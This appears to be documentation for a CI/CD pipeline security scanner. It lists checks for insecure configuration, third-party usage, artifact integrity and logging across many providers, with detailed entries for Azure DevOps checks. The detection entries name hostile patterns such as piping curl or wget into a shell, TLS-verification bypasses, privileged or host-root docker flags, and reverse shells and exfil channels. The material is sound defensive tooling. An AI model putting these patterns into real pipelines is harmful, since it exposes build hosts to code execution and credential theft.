CICD-SEC-7: Insecure System Configuration

Privileged containers, host mounts, root user, and disabled TLS turn a routine RCE in a build step into kernel-level access to the runner host.

Evidenced by 87 checks across 16 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, CloudFormation, Dockerfile, Drone CI, GitHub Actions, GitLab CI, Jenkins, Kubernetes, Tekton, Terraform).

Check Title Severity Provider Fix
ADO-013 Self-hosted pool without explicit ephemeral marker MEDIUM Azure DevOps
ADO-015 Job has no timeoutInMinutes, unbounded build MEDIUM Azure DevOps 🔧 fix
ADO-017 Docker run with insecure flags (privileged/host mount) CRITICAL Azure DevOps 🔧 fix
ADO-026 Pipeline contains indicators of malicious activity CRITICAL Azure DevOps
ADO-030 pool interpolates attacker-controllable value HIGH Azure DevOps 🔧 fix
ARGO-006 Literal secret value in Argo template env or parameter default CRITICAL Argo Workflows 🔧 fix
ARGO-013 Argo workflow does not opt out of SA token automount MEDIUM Argo Workflows
BB-005 Step has no max-time, unbounded build MEDIUM Bitbucket 🔧 fix
BB-013 Docker run with insecure flags (privileged/host mount) CRITICAL Bitbucket 🔧 fix
BB-016 Self-hosted runner without ephemeral marker MEDIUM Bitbucket
BB-020 Full clone depth exposes complete history LOW Bitbucket
BB-025 Pipeline contains indicators of malicious activity CRITICAL Bitbucket
BK-002 Literal secret value in pipeline env block CRITICAL Buildkite 🔧 fix
BK-007 Deploy step not gated by a manual block / input MEDIUM Buildkite
BK-015 agents map interpolates attacker-controllable Buildkite variable HIGH Buildkite
CB-002 Privileged mode enabled HIGH AWS
CB-004 No build timeout configured LOW AWS
CB-005 Outdated managed build image MEDIUM AWS
CB-011 CodeBuild buildspec contains indicators of malicious activity CRITICAL AWS
CC-010 Self-hosted runner without ephemeral marker MEDIUM CircleCI
CC-015 No no_output_timeout configured MEDIUM CircleCI 🔧 fix
CC-017 Docker run with insecure flags (privileged/host mount) CRITICAL CircleCI 🔧 fix
CC-026 Config contains indicators of malicious activity CRITICAL CircleCI
CF-003 CloudFormation resource opens a 0.0.0.0/0 ingress HIGH CloudFormation
DF-002 Container runs as root (missing or root USER directive) HIGH Dockerfile 🔧 fix
DF-008 RUN invokes docker --privileged or escalates capabilities HIGH Dockerfile
DF-011 Package manager install without cache cleanup in same layer LOW Dockerfile
DF-012 RUN invokes sudo HIGH Dockerfile
DF-013 EXPOSE declares sensitive remote-access port CRITICAL Dockerfile 🔧 fix
DF-014 WORKDIR set to a system / kernel filesystem path CRITICAL Dockerfile
DF-015 RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM Dockerfile
DF-017 ENV PATH prepends a world-writable directory MEDIUM Dockerfile 🔧 fix
DF-018 RUN chown rewrites ownership of a system path MEDIUM Dockerfile
DR-004 Literal credential in step environment / settings CRITICAL Drone CI
DR-011 node map interpolates attacker-controllable Drone variable HIGH Drone CI
ECR-004 No lifecycle policy configured LOW AWS
GCB-005 Build timeout unset or excessive LOW Cloud Build 🔧 fix
GCB-016 Step dir field contains parent-directory escape (..) MEDIUM Cloud Build
GCB-021 No private worker pool, build runs on the shared default pool MEDIUM Cloud Build 🔧 fix
GHA-012 Self-hosted runner without ephemeral marker MEDIUM GitHub Actions
GHA-015 Job has no timeout-minutes, unbounded build MEDIUM GitHub Actions 🔧 fix
GHA-017 Docker run with insecure flags (privileged/host mount) CRITICAL GitHub Actions 🔧 fix
GHA-026 Container job disables isolation via options: HIGH GitHub Actions
GHA-027 Workflow contains indicators of malicious activity CRITICAL GitHub Actions
GHA-036 runs-on interpolates untrusted context HIGH GitHub Actions 🔧 fix
GHA-038 Workflow re-enables retired ::set-env / ::add-path commands CRITICAL GitHub Actions
GL-014 Self-managed runner without ephemeral tag MEDIUM GitLab CI
GL-015 Job has no timeout, unbounded build MEDIUM GitLab CI 🔧 fix
GL-017 Docker run with insecure flags (privileged/host mount) CRITICAL GitLab CI 🔧 fix
GL-025 Pipeline contains indicators of malicious activity CRITICAL GitLab CI
GL-032 tags: interpolates untrusted CI variable HIGH GitLab CI 🔧 fix
JF-014 Agent label missing ephemeral marker MEDIUM Jenkins
JF-015 Pipeline has no timeout wrapper, unbounded build MEDIUM Jenkins 🔧 fix
JF-017 Docker run with insecure flags (privileged/host mount) CRITICAL Jenkins 🔧 fix
JF-025 Kubernetes agent pod template runs privileged or mounts hostPath HIGH Jenkins
JF-029 Jenkinsfile contains indicators of malicious activity CRITICAL Jenkins
JF-032 Agent label interpolates attacker-controllable value HIGH Jenkins 🔧 fix
K8S-002 Pod hostNetwork: true HIGH Kubernetes 🔧 fix
K8S-003 Pod hostPID: true HIGH Kubernetes 🔧 fix
K8S-004 Pod hostIPC: true HIGH Kubernetes 🔧 fix
K8S-005 Container securityContext.privileged: true CRITICAL Kubernetes 🔧 fix
K8S-006 Container allowPrivilegeEscalation not explicitly false HIGH Kubernetes 🔧 fix
K8S-007 Container runAsNonRoot not true / runAsUser is 0 HIGH Kubernetes 🔧 fix
K8S-008 Container readOnlyRootFilesystem not true MEDIUM Kubernetes 🔧 fix
K8S-009 Container capabilities not dropping ALL / adding dangerous caps HIGH Kubernetes
K8S-010 Container seccompProfile not RuntimeDefault or Localhost MEDIUM Kubernetes
K8S-013 Pod uses a hostPath volume HIGH Kubernetes 🔧 fix
K8S-014 Pod hostPath references a sensitive host directory CRITICAL Kubernetes
K8S-015 Container missing resources.limits.memory MEDIUM Kubernetes
K8S-016 Container missing resources.limits.cpu LOW Kubernetes
K8S-022 Service exposes SSH (port 22) MEDIUM Kubernetes
K8S-023 Namespace missing Pod Security Admission enforcement label HIGH Kubernetes
K8S-024 Container missing both livenessProbe and readinessProbe MEDIUM Kubernetes
K8S-025 System priority class used outside kube-system HIGH Kubernetes
K8S-026 LoadBalancer Service has no loadBalancerSourceRanges HIGH Kubernetes
K8S-027 Ingress has no TLS configuration MEDIUM Kubernetes
K8S-028 Container declares hostPort MEDIUM Kubernetes 🔧 fix
K8S-030 Workload schedules onto a control-plane node HIGH Kubernetes 🔧 fix
K8S-031 Namespace missing PSA warn label LOW Kubernetes
K8S-032 Namespace lacks default-deny NetworkPolicy MEDIUM Kubernetes
K8S-033 Namespace lacks ResourceQuota or LimitRange MEDIUM Kubernetes
K8S-035 Container securityContext.runAsUser is 0 HIGH Kubernetes
K8S-038 NetworkPolicy ingress / egress allows all sources or destinations MEDIUM Kubernetes
K8S-039 Pod uses shareProcessNamespace: true MEDIUM Kubernetes
K8S-040 Container securityContext.procMount: Unmasked HIGH Kubernetes
TF-003 CodeBuild VPC shares its VPC with a public subnet HIGH Terraform
TKN-005 Literal secret value in Tekton step env or param default CRITICAL Tekton 🔧 fix

CICD-SEC-8: Ungoverned Usage of 3rd-Party Services

Calls to external services, SaaS integrations, marketplace actions, package registries, expand the trust perimeter of the pipeline beyond what was reviewed and approved.

Evidenced by 8 checks across 2 providers (AWS, GitHub Actions).

Check Title Severity Provider Fix
CA-003 CodeArtifact domain policy allows cross-account wildcard CRITICAL AWS
CCM-003 CodeCommit trigger targets SNS/Lambda in a different account MEDIUM AWS
EB-002 EventBridge rule has a wildcard target ARN HIGH AWS
ECR-003 Repository policy allows public access CRITICAL AWS
GHA-047 Action ref resolves to a recently committed tag or SHA MEDIUM GitHub Actions
LMB-002 Lambda function URL has AuthType=NONE HIGH AWS
LMB-004 Lambda resource policy allows wildcard principal CRITICAL AWS
SM-002 Secrets Manager resource policy allows wildcard principal CRITICAL AWS

CICD-SEC-9: Improper Artifact Integrity Validation

Without provenance, attestations, signatures, or SBOMs, consumers (including production) cannot verify that the artifact running in production is the one the pipeline built.

Evidenced by 62 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Jenkins, OCI manifest, Tekton).

Check Title Severity Provider Fix
ADO-006 Artifacts not signed MEDIUM Azure DevOps
ADO-007 SBOM not produced MEDIUM Azure DevOps
ADO-024 No SLSA provenance attestation produced MEDIUM Azure DevOps
ARGO-007 Argo workflow has no activeDeadlineSeconds LOW Argo Workflows
ARGO-009 Artifacts not signed (no cosign/sigstore step) MEDIUM Argo Workflows
ARGO-010 No SBOM generated for build artifacts MEDIUM Argo Workflows
ARGO-011 No SLSA provenance attestation produced MEDIUM Argo Workflows
ARGO-012 No vulnerability scanning step MEDIUM Argo Workflows
ARGO-015 Input artifact pulls from an insecure (non-HTTPS) URL HIGH Argo Workflows
ATTEST-001 SLSA provenance attests an untrusted builder identity HIGH OCI manifest
ATTEST-002 SLSA provenance source-repo claim is missing or unverifiable HIGH OCI manifest
ATTEST-003 SBOM contains floating-version dependencies MEDIUM OCI manifest
BB-006 Artifacts not signed MEDIUM Bitbucket
BB-007 SBOM not produced MEDIUM Bitbucket
BB-024 No SLSA provenance attestation produced MEDIUM Bitbucket
BK-006 Step has no timeout_in_minutes LOW Buildkite
BK-009 Artifacts not signed (no cosign/sigstore step) MEDIUM Buildkite
BK-010 No SBOM generated for build artifacts MEDIUM Buildkite
BK-011 No SLSA provenance attestation produced MEDIUM Buildkite
BK-012 No vulnerability scanning step MEDIUM Buildkite
CA-001 CodeArtifact domain not encrypted with customer KMS CMK MEDIUM AWS
CC-006 Artifacts not signed (no cosign/sigstore step) MEDIUM CircleCI
CC-007 SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM CircleCI
CC-024 No SLSA provenance attestation produced MEDIUM CircleCI
CCM-002 CodeCommit repository not encrypted with customer KMS CMK MEDIUM AWS
CP-002 Artifact store not encrypted with customer-managed KMS key MEDIUM AWS
CWL-002 CodeBuild log group not KMS-encrypted MEDIUM AWS
DF-003 ADD pulls remote URL without integrity verification HIGH Dockerfile
DF-016 Image lacks OCI provenance labels LOW Dockerfile
ECR-002 Image tags are mutable HIGH AWS
ECR-005 Repository encrypted with AES256 rather than KMS CMK MEDIUM AWS
GCB-009 Artifacts not signed (no cosign / sigstore step) MEDIUM Cloud Build
GCB-015 SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM Cloud Build
GCB-017 Image-producing build does not request SLSA provenance MEDIUM Cloud Build
GCB-024 Build pushes Docker images but top-level images: is empty LOW Cloud Build
GHA-006 Artifacts not signed (no cosign/sigstore step) MEDIUM GitHub Actions
GHA-007 SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM GitHub Actions
GHA-024 No SLSA provenance attestation produced MEDIUM GitHub Actions
GL-006 Artifacts not signed MEDIUM GitLab CI
GL-007 SBOM not produced MEDIUM GitLab CI
GL-024 No SLSA provenance attestation produced MEDIUM GitLab CI
JF-006 Artifacts not signed MEDIUM Jenkins
JF-007 SBOM not produced MEDIUM Jenkins
JF-027 archiveArtifacts does not record a fingerprint LOW Jenkins
JF-028 No SLSA provenance attestation produced MEDIUM Jenkins
LMB-001 Lambda function has no code-signing config HIGH AWS
OCI-002 Image is missing a build attestation manifest HIGH OCI manifest
OCI-004 Image layer references an arbitrary URL (foreign layer) HIGH OCI manifest
OCI-007 Image manifest uses legacy schemaVersion 1 (no content addressing) HIGH OCI manifest
OCI-008 Manifest references digest using unsupported hash algorithm HIGH OCI manifest
S3-001 Artifact bucket public access block not fully enabled CRITICAL AWS
S3-002 Artifact bucket server-side encryption not configured HIGH AWS
S3-003 Artifact bucket versioning not enabled MEDIUM AWS
S3-005 Artifact bucket missing aws:SecureTransport deny MEDIUM AWS
SIGN-001 No AWS Signer profile defined for Lambda deploys MEDIUM AWS
SIGN-002 AWS Signer profile is revoked or inactive HIGH AWS
SSM-002 SSM SecureString uses the default AWS-managed key MEDIUM AWS
TKN-006 Tekton run lacks an explicit timeout LOW Tekton
TKN-009 Artifacts not signed (no cosign/sigstore step) MEDIUM Tekton
TKN-010 No SBOM generated for build artifacts MEDIUM Tekton
TKN-011 No SLSA provenance attestation produced MEDIUM Tekton
TKN-012 No vulnerability scanning step MEDIUM Tekton

CICD-SEC-10: Insufficient Logging and Visibility

When the pipeline doesn't log its decisions, audits stall and incident response lacks the timeline needed to scope a compromise.

Evidenced by 42 checks across 8 providers (AWS, CircleCI, Cloud Build, Dockerfile, Jenkins, Kubernetes, OCI manifest, SCM).

Check Title Severity Provider Fix
ATTEST-003 SBOM contains floating-version dependencies MEDIUM OCI manifest
CA-000 CodeArtifact API access failed INFO AWS
CB-000 CodeBuild API access failed INFO AWS
CB-003 Build logging not enabled MEDIUM AWS
CC-011 No store_test_results step (test results not archived) LOW CircleCI
CCM-000 CodeCommit API access failed INFO AWS
CD-000 CodeDeploy API access failed INFO AWS
CD-003 No CloudWatch alarm monitoring on deployment group MEDIUM AWS
CP-000 CodePipeline API access failed INFO AWS
CT-000 CloudTrail API access failed INFO AWS
CT-001 No active CloudTrail trail in region HIGH AWS
CT-002 CloudTrail log-file validation disabled MEDIUM AWS
CT-003 CloudTrail trail is not multi-region MEDIUM AWS
CW-001 No CloudWatch alarm on CodeBuild FailedBuilds metric LOW AWS
CWL-000 CloudWatch Logs API access failed INFO AWS
CWL-001 CodeBuild log group has no retention policy LOW AWS
DF-007 No HEALTHCHECK directive declared LOW Dockerfile 🔧 fix
DF-016 Image lacks OCI provenance labels LOW Dockerfile
EB-000 EventBridge API access failed INFO AWS
EB-001 No EventBridge rule for CodePipeline failure notifications MEDIUM AWS
ECR-000 ECR API access failed INFO AWS
GCB-014 Build logging disabled (options.logging: NONE) HIGH Cloud Build 🔧 fix
GCB-017 Image-producing build does not request SLSA provenance MEDIUM Cloud Build
GCB-025 Build has no tags for audit / discoverability LOW Cloud Build
IAM-000 IAM API access failed INFO AWS
JF-011 Pipeline has no buildDiscarder retention policy LOW Jenkins 🔧 fix
K8S-024 Container missing both livenessProbe and readinessProbe MEDIUM Kubernetes
KMS-000 KMS API access failed INFO AWS
LMB-000 Lambda API access failed INFO AWS
OCI-001 Image manifest is missing OCI provenance annotations MEDIUM OCI manifest
OCI-002 Image is missing a build attestation manifest HIGH OCI manifest
OCI-003 Image manifest is missing the image.created annotation LOW OCI manifest
OCI-005 Image manifest is missing the image.licenses annotation LOW OCI manifest
PBAC-000 PBAC enumeration failed INFO AWS
S3-000 S3 API access failed INFO AWS
S3-004 Artifact bucket access logging not enabled LOW AWS
SCM-003 GitHub default code scanning is not enabled MEDIUM SCM
SCM-005 Dependabot security updates are not enabled MEDIUM SCM
SCM-008 Default branch protection does not require status checks MEDIUM SCM
SCM-016 Private vulnerability reporting is not enabled LOW SCM
SM-000 Secrets Manager API access failed INFO AWS
SSM-000 SSM Parameter Store API access failed INFO AWS

Check details

Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.

ADO-001: Task reference not pinned to specific version HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. Pass when every task: reference carries a two- or three-segment semver.

Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-001 in the Azure DevOps provider.

ADO-002: Script injection via attacker-controllable context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.

Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.

Source: ADO-002 in the Azure DevOps provider.

ADO-003: Variables contain literal secret values CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.

Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.

Source: ADO-003 in the Azure DevOps provider.

ADO-004: Deployment job missing environment binding MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.

Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.

Source: ADO-004 in the Azure DevOps provider.

ADO-005: Container image not pinned to specific version HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Container images can be declared at resources.containers[].image or job.container (string or {image:}). Floating / untagged refs let the publisher swap the image contents.

Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag. Avoid :latest and untagged refs.

Source: ADO-005 in the Azure DevOps provider.

ADO-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Passes when cosign / sigstore / slsa-* / notation-sign appears anywhere in the pipeline text.

Recommendation. Add a task that runs cosign sign or notation sign, Azure Pipelines' workload identity federation enables keyless signing. Publish the signature to the artifact feed and verify it at deploy time.

Source: ADO-006 in the Azure DevOps provider.

ADO-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact.

Recommendation. Add an SBOM step, microsoft/sbom-tool, syft . -o cyclonedx-json, or anchore/sbom-action. Publish the SBOM as a pipeline artifact so downstream consumers can ingest it.

Source: ADO-007 in the Azure DevOps provider.

ADO-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements ADO-003 (which looks at variables: keys). ADO-008 scans every string in the pipeline against the cross-provider credential-pattern catalog.

Recommendation. Rotate the exposed credential. Move the value to Azure Key Vault or a secret variable group and reference it via $(SECRET_NAME).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: ADO-008 in the Azure DevOps provider.

ADO-009: Container image pinned by tag rather than sha256 digest LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. ADO-005 fails floating tags at HIGH; ADO-009 is the stricter tier. Even immutable-looking version tags can be repointed by registry operators.

Recommendation. Resolve each image to its current digest and replace the tag with @sha256:<digest>. Schedule regular digest bumps via Renovate or a scheduled pipeline.

Source: ADO-009 in the Azure DevOps provider.

ADO-010: Cross-pipeline download: ingestion unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. resources.pipelines: declares an upstream pipeline; a download: <name> step pulls its artifacts. If the upstream accepts PR validation, the artifact may have been built by PR-controlled code.

Recommendation. Add a verification step before consuming the artifact: cosign verify-attestation, sha256sum -c, or gpg --verify against a manifest the producing pipeline signed.

Source: ADO-010 in the Azure DevOps provider.

ADO-011: template: <local-path> on PR-validated pipeline HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. template: <relative-path> includes another YAML from the CURRENT repo. On PR validation builds, the repo content is the PR branch, letting the PR author swap the template body. Cross-repo templates (template: foo.yml@my-repo) are version-pinned and not affected.

Recommendation. Move the template into a separate, branch-protected repository and reference it via template: foo.yml@<repo-resource> with a pinned ref: on the resource. That way the template content is fixed at PR creation time and can't be modified from the PR branch.

Source: ADO-011 in the Azure DevOps provider.

ADO-012: Cache@2 key derives from $(System.PullRequest.*) MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Cache@2 (and older CacheBeta@1) restore by key. A key including PR-controlled variables on PR-validated pipelines lets a PR seed a poisoned cache entry that a later default-branch pipeline restores.

Recommendation. Build the cache key from values the PR can't control: $(Agent.OS), lockfile hashes, the pipeline name. Never reference $(System.PullRequest.*) or $(Build.SourceBranch*) from a cache key namespace.

Source: ADO-012 in the Azure DevOps provider.

ADO-013: Self-hosted pool without explicit ephemeral marker MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. pool: { name: <agent-pool> } (or the bare string form pool: <name>) targets a self-hosted agent pool. Without an explicit ephemeral arrangement, agents reuse state across jobs. Microsoft-hosted pools (vmImage: or the Azure Pipelines / Default names) are skipped.

Recommendation. Configure the agent pool with autoscaling + ephemeral agents (the Azure VM Scale Set agent), and add demands: [ephemeral -equals true] on the pool block so this check can verify it.

Source: ADO-013 in the Azure DevOps provider.

ADO-014: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in pipeline variables or task inputs can't be rotated on a fine-grained schedule. Prefer OIDC or vault-based credential injection for cross-cloud access.

Recommendation. Use workload identity federation or an Azure Key Vault task to inject short-lived AWS credentials at runtime. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from pipeline variables and task parameters.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-014 in the Azure DevOps provider.

ADO-015: Job has no timeoutInMinutes, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without timeoutInMinutes, the job runs until Azure's 60-minute default kills it. Explicit timeouts cap blast radius and the window during which a compromised step has access to service connections.

Recommendation. Add timeoutInMinutes: to each job, sized to the 95th percentile of historical runtime plus margin. Azure's default is 60 minutes, an explicitly shorter value limits blast radius and agent cost.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-015 in the Azure DevOps provider.

ADO-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: ADO-016 in the Azure DevOps provider.

ADO-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the build agent, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-017 in the Azure DevOps provider.

ADO-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a pipeline. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-018 in the Azure DevOps provider.

ADO-019: extends: template on PR-validated pipeline points to local path CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. extends: template: <local-file> includes another YAML from the CURRENT repo. On PR validation builds, the repo content is the PR branch, letting the PR author swap the template body and inject arbitrary pipeline logic. Cross-repo templates (template: foo.yml@my-repo) are version-pinned and not affected.

Recommendation. Pin the extends template to a protected repository ref (template@ref). Local templates in PR-validated pipelines can be poisoned by the PR author.

Source: ADO-019 in the Azure DevOps provider.

ADO-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: ADO-020 in the Azure DevOps provider.

ADO-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-021 in the Azure DevOps provider.

ADO-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR pipeline (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: ADO-022 in the Azure DevOps provider.

ADO-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: ADO-023 in the Azure DevOps provider.

ADO-024: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. On Azure Pipelines the common pattern is a Bash@3 task invoking cosign attest --yes --predicate=provenance.json $(image). The native Microsoft SBOM tool emits _manifest/spdx_2.2/manifest.spdx.json for SBOM but does not produce provenance on its own.

Recommendation. Add a task that runs cosign attest against a provenance.intoto.jsonl statement, or Microsoft's sbom-tool in attestation mode. ADO-006 covers signing; this rule covers the in-toto statement SLSA Build L3 additionally requires.

Source: ADO-024 in the Azure DevOps provider.

ADO-025: Cross-repo template not pinned to commit SHA HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Azure Pipelines resolves template: build.yml@tools against the tools repo resource's ref: field. When that ref is refs/heads/main (or missing, which defaults to the pipeline's default branch), a push to the callee repo changes what your pipeline runs on the next invocation.

Recommendation. On every resources.repositories entry referenced from a template: ...@repo-alias directive, set ref: refs/tags/<sha> or the bare 40-char commit SHA, never a branch or floating tag. A moved branch/tag swaps the template body without changing your pipeline file.

Source: ADO-025 in the Azure DevOps provider.

ADO-026: Pipeline contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. ADO pipelines can run arbitrary shell via bash / script / powershell tasks. This rule scans every string value for known-bad patterns (reverse shells, base64-decoded execution, miner binaries, exfil channels). Orthogonal to ADO-016/ADO-017/ADO-023.

Recommendation. Treat as a potential compromise. Identify the PR/branch that added the matching task(s), rotate any Service Connections the pipeline can reach, and audit Pipeline run logs for outbound traffic to the matched hosts.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: ADO-026 in the Azure DevOps provider.

